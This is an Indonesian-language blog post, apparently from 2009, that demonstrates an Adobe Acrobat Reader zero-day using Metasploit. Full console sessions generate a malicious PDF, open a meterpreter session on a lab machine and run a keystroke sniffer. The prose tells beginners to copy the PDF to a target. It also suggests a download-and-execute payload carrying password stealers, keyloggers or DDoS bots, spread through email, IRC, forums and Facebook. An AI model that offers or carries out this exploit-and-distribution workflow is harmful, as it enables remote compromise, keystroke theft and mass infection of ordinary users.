Home > Tutorial > Twitter and Adobe 0.9-day spl0it

Twitter and Adobe 0.9-day spl0it

Salah satu artis yang terkenal dengan istilah ‘bechek’-nya pernah bilang dalam salah satu sesi wawancara untuk “acara televisi full of non-sense but terribly popular” (attention: something called infoblabla) bahwa twitter, facebook, friendster itu gak ada gunanya. Do’i gak mungkin ikutan begituan karena terlalu sibuk dengan skull, corse, blablabla. Dan yang ikutan begituan (attention: geek said, social networking) hanya orang-orang yang gak punya kerjaan.

Well, somehow, this cute little girl *heh??* probably right.

Unfortunately, gak semua orang update status untuk hal-hal yang tidak perlu. Komunitas security umumnya seringkali memposting hal-hal yang bermanfaat, dan lebih cepat mendapatkan informasi tersebut dibandingkan menunggu muncul di blog, news, forum, dll. Beberapa hal menarik diantaranya diskusi kecil-kecilan mengenai bug dan expl0it.

Baru-baru ini merebak mengenai adobe acrobat reader 0day, salah satu yang membahas bisa lihat di http://bit.ly/7UjG26. HDM dalam twitter nya pernah meminta contoh exploit tersebut bagi siapa saja yang memilikinya, dan dalam waktu singkat contoh 0day sploit tersebut didapatkan, copy nya bisa di download dari http://bit.ly/5VqgVv. Dan tentu saja dalam beberapa jam exploit tersebut muncul dalam repo metasploit, let’s give it a try:
view sourceprint?
01.Snow $ sudo ./msfconsole
02.Password:
03.
04. 888 888 d8b888
05. 888 888 Y8P888
06. 888 888 888
07.88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
08.888 “888 “88bd8P Y8b888 “88b88K 888 “88b888d88″”88b888888
09.888 888 88888888888888 .d888888″Y8888b.888 888888888 888888888
10.888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
11.888 888 888 “Y8888 “Y888″Y888888 88888P’88888P” 888 “Y88P” 888 “Y888
12. 888
13. 888
14. 888
15.
16. =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
17.+ — –=[ 476 exploits – 220 auxiliary
18.+ — –=[ 192 payloads – 22 encoders – 8 nops
19. =[ svn r7893 updated today (2009.12.16)
20.
21.msf > version
22.Framework: 3.3.3-dev.7817
23.Console : 3.3.3-dev.7855
24.msf > use windows/fileformat/adobe_media_newplayer
25.msf exploit(adobe_media_newplayer) > set PAYLOAD windows/meterpreter/bind_tcp
26.PAYLOAD => windows/meterpreter/bind_tcp
27.msf exploit(adobe_media_newplayer) > set RHOST 172.16.30.129
28.RHOST => 172.16.30.129
29.msf exploit(adobe_media_newplayer) > exploit
30.
31.[*] Started bind handler
32.[*] Creating ‘msf.pdf’ file…
33.[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
34.[*] Exploit completed, but no session was created.

Dear newbie, silahkan copy file msf.pdf ke komputer target untuk dibuka menggunakan adobe acrobat reader. Dalam eksperimen ini saya menggunakan adobe acrobat reader versi 9.1.0 di windows XP SP3 (non DEP).
view sourceprint?
01.msf exploit(adobe_media_newplayer) > exploit
02.
03.[*] Started bind handler
04.[*] Creating ‘msf.pdf’ file…
05.[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
06.[*] Sending stage (723456 bytes)
07.[*] Meterpreter session 1 opened (172.16.30.1:57665 -> 172.16.30.129:4444)
08.
09.meterpreter > idletime
10.User has been idle for: 2 mins 25 secs
11.meterpreter > keyscan_start
12.Starting the keystroke sniffer…
13.meterpreter > keyscan_dump
14.Dumping captured keystrokes…
15.www.google.com
16.meterpreter > ctrl-z
17.Background session 1? [y/N]

Well, tentu saja dry joke (talking ’bout artist di blog kecoak???) di malam hari menjelang tidur ini bukan untuk high skilled exploiter. Hanya menunjukan sedikit mainan dari exploit terbaru Adobe acrobat reader menggunakan metasploit framework. Dalam contoh diatas tentu saja tidak selalu harus untuk kepentingan RCE (Remote Command Execution), bisa di-imajinasikan jika payload yang digunakan adalah “windows/download_exec” dari url tertentu dimana pada url tersebut telah tersimpan worm, program kecil pencuri password (paypal, email, facebook, banking), program kecil pencuri keystroke di windows, program kecil yang dapat men-scan document untuk mencari data tertentu (misal: doc pemerintahan, bisnis), ataupun sekedar bot untuk menjadi slave serangan ddos.

Cukup sebar file .pdf tersebut melalui email, irc, milist, forum, facebook, dll. Dan dalam sekejap, banyak hal yang kita inginkan bisa didapatkan. Itu sebabnya vuln dari software seperti adobe acrobat reader yang notabene pasti ada di setiap komputer windows sangat berbahaya, berbagai level dan kalangan menggunakan aplikasi tersebut, sehinggal 0day nya akan berakibat fatal.

So, take care, fellas!

kalo artikelnya kurang jelas,… baca langsung dari sumbernya disini

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: